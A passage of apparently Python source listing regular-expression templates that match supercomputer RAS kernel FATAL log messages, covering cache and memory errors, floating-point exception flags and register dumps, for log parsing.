r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL capture first directory correctable error address..[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL capture first directory uncorrectable error address..[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL capture first EDRAM correctable error address..[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL capture first EDRAM parity error address..[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL capture first EDRAM uncorrectable error address..[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL capture valid.........[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL CHECK_INITIAL_GLOBAL_INTERRUPT_VALUES$".format(eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL chip select...........0$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL close EDRAM pages as soon as possible....[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL command manager unit summary.....................0$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL correctable error detected in directory [01]......[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL correctable error detected in EDRAM bank [01].....[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL correctable error.....[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL critical input interrupt enable...[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL d-cache flush parity error........[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL d-cache search parity error.......[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL data address space................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL data read plb error...............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL data store interrupt caused by \w\w\w\w.........[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL data write plb error..............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL dbcr0={hex_address} dbsr={hex_address} ccr0={hex_address}$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL DDR failing address register: {hex_address} {hex_address}$".format( hex_address=hex_address),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL DDR failing data registers: {hex_address} {hex_address}$".format( hex_address=hex_address),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL DDR failing info register: DDR Fail Info Register: {hex_address}$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL ddrSize == .*? \|\| ddrSize == .*?$".format(eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL debug interrupt enable............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL debug wait enable.................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL disable all access to cache directory....[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL disable apu instruction broadcast........[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL disable flagging of DDR UE's as major internal error.[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL disable speculative access...............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL disable store gathering..................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL disable trace broadcast..................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL disable write lines 2:4..................[10]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL divide-by-zero exception.................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL enable divide-by-zero exceptions.........[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL enable inexact exceptions................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL enable invalid operation exceptions......[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL enable non-IEEE mode.....................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL enable overflow exceptions...............[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL enable underflow exceptions..............[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL enabled exception summary................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL Error sending packet on tree network, packet at address {eight_hex} is not aligned$".format(eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL exception summary........................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL exception syndrome register: {hex_address}$".format( hex_address=hex_address),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL external input interrupt enable...[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL floating point instr. enabled.....[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL floating point operation....................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL Floating Point Registers:$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL Floating Point Status and Control Register: {hex_address}$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL floating pt ex mode 0 enable......[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL floating pt ex mode 1 enable......[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL force load/store alignment...............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL fpr.+?={hex_address} {eight_hex} {eight_hex} {eight_hex}$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL fraction inexact.........................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL fraction rounded.........................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL gister: machine state register: machine state register: machine state register: machine state register: machine state register:$".format( LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL guaranteed data cache block touch........[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL guaranteed instruction cache block touch.[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL i-cache parity error..............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL icache prefetch depth....................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL icache prefetch threshold................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL imprecise machine check...........[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL inexact exception........................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL instruction address space.........[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL instruction plb error.............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL interrupt threshold...0$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL invalid \(compare\)........................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL invalid \(Inf/Zero\).......................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL invalid \(Inf[-/]Inf\)........................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL invalid \(SNAN\)...........................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL invalid \(Zero/Zero\)......................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL invalid operation exception \(int cnvt\)...[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL invalid operation exception \(software\)...[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL invalid operation exception \(sqrt\).......[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL invalid operation exception summary......[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL lr={hex_address} cr={hex_address} xer={hex_address} ctr={hex_address}$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL m?a?x=\d+?$".format( LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL machine check enable..............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL machine check summary.............[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL machine check: i-fetch......................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL machine state register: machine state register: machine state register: machine state register: machine state register: machine$".format( LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL MailboxMonitor::serviceMailboxes\(\) lib_ido_error: -1114 unexpected socket error: Broken pipe$".format(hex_address=hex_address, LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL max number of outstanding prefetches.....\d$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL memory and bus summary...........................0$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL memory manager / command manager address parity..[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL memory manager address error.....................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL memory manager address parity error..............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL memory manager miscompare........................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL memory manager refresh...........................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL memory manager RMW buffer parity.................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL memory manager store buffer parity...............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL memory manager strobe gate.......................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL memory manager uncorrectable error...............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL minus denormalized number................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL minus inf................................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL minus normalized number..................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL minus zero...............................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL miscompare............0$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL msr={hex_address} dear={hex_address} esr={hex_address} fpscr={hex_address}$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL number of correctable errors detected in L3 directories...0$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL number of correctable errors detected in L3 EDRAMs.........+?$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL number of lines with parity errors written to L3 EDRAMs...[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL overflow exception.......................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL parity error in bank [01].........................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL parity error in read queue [01]...................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL parity error in read queue PLB.................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL parity error in write buffer...................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL parity error.......[01]$".format( LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL plus denormalized number.................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL plus infinity............................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL plus normalized number...................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL plus zero................................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL prefetch depth for core \d................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL prefetch depth for PLB slave.............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL pro(gram)?$".format( ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL problem state \(0=sup,1=usr\).......[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL program interrupt: fp compare...............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL program interrupt: fp cr field .............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL program interrupt: fp cr update.............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL program interrupt: illegal instruction......[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL program interrupt: imprecise exception......[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL program interrupt: privileged instruction...[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL program interrupt: trap instruction.........[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL program interrupt: unimplemented operation..[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL quiet NaN................................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL qw trapped............0$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL r.+?={hex_address} r.+?={hex_address} r.+?={hex_address} r.+?={hex_address}$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL regctl scancom interface.........................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL reserved.................................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL round nearest............................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL round toward -infinity...................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL round toward \+infinity...................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL round toward zero........................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL rts internal error$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL rts tree/torus link training failed: wanted: .+? got: .+?$".format( ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL rts: bad message header: .+? \(softheader=.+?\) PSR0={eight_hex} PSR1={eight_hex} PRXF={eight_hex} PIXF={eight_hex}$".format(eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL size of DDR we are caching...............1 \(512M\)$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL size of scratchpad portion of L3.........[01] \(0M\)$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL special purpose registers:$".format( general_purpose_registers=general_purpose_registers),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL start flushing...........................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL start initialization.....................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL start prefetching........................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL start retagging..........................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL state machine....................................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL machine state register:$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL state register: machine state register: machine state register: machine state register: machine state register: machine state re$".format( LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL store operation.............................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL summary...........................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL Target=ido://{LP_ADDRESS}/JTAG/\d+? Message=.+?$".format( LP_ADDRESS=LP_ADDRESS),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL tlb error.........................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL turn on hidden refreshes.................[10]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL uncorrectable error detected in directory [01]....[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL uncorrectable error detected in EDRAM bank [01]...[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL uncorrectable error detected in external DDR...[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL uncorrectable error...[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL underflow exception......................[01]$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL VALIDATE_LOAD_IMAGE_CRC_IN_DRAM$".format(hexchar=hexchar, hex_address=hex_address, LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL wait state enable.................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL write buffer commit threshold............2$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL {data_address}$".format( data_address=data_address),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL {ddr_failing_info_register}$".format( ddr_failing_info_register=ddr_failing_info_register),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL {general_purpose_registers}$".format( general_purpose_registers=general_purpose_registers),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL {hex_address} {hex_address}$".format( hex_address=hex_address),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL {instruction_address}$".format( instruction_address=instruction_address),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL {l3_ecc_control_register}$".format( l3_ecc_control_register=l3_ecc_control_register),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL {l3_ecc_status_register}$".format( l3_ecc_status_register=l3_ecc_status_register),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL {l3_global_control_register}$".format( l3_global_control_register=l3_global_control_register),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL {machine_check_status}$".format( machine_check_status=machine_check_status),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL (FATAL|INFO) [Mm]achine [sS]tate [Rr]egister: {hex_address}$".format(hex_address=hex_address),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL {mask}$".format( mask=mask),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL {special_purpose_registers}$".format( special_purpose_registers=special_purpose_registers),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL {symbol}$".format( symbol=symbol),
